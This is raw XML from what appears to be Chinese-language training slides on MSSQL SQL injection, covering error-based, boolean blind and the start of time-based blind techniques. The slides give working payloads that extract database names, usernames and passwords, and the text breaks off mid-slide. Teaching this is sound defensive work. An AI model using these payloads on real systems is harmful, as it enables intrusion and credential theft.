                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>='users' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>FOR XML PATH(''))</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36060309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报错注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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报错注入的过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709775" y="1885315"/>
            <a:ext cx="12055731" cy="1556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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、获取数据：  </a:t>
            </a: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and 1=(select </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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>from users where id=1))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRP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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>and 1=(select quotename(username),quotename(password) from users for xml path(''))</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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5039698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报错注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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报错注入的过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709775" y="1885316"/>
            <a:ext cx="12055731" cy="266489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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、其他函数注入：  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRP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and 1=(select </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cast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>(name as int) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sys.databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>database_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>=1)– </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRP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and 1=(select </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convert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>int,name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sys.databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>database_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>=1)– </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>cast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>convert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>函数转换数据类型报错进行注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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9783572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报错注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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布尔盲注的过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709775" y="1885315"/>
            <a:ext cx="12055731" cy="340355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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>布尔盲注跟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>相似：</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1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>布尔盲注，</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rPr>
              <a:t>mid,substr,substring,ascii</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rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>使用</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ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>和</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substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>比对。</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600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>获取数据：  </a:t>
            </a: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and </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substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>((select top 1 name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sys.sysdatabases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>),1,1)='m'--</a:t>
            </a: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and substring((select top 1 name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sys.sysdatabases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>),2,1)='a'--</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>and ascii(substring((select top 1 name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sys.sysdatabases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>),1,1))=109-- </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rPr>
              <a:t>字符</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m</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>and ascii(substring((select top 1 name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sys.sysdatabases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>),2,1))=97-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> </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rPr>
              <a:t>字符</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a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>查库名、表名、字段名、字段内容使用此法类推即可。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31596454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报错注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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时间盲注的过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709775" y="1885315"/>
            <a:ext cx="12055731" cy="266489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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>时间盲注跟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>相似：</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1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>时间盲注，</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rPr>
              <a:t>sleep,benchmark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>。</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150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Mssql</a:t>
            </a:r>
            <a:r>
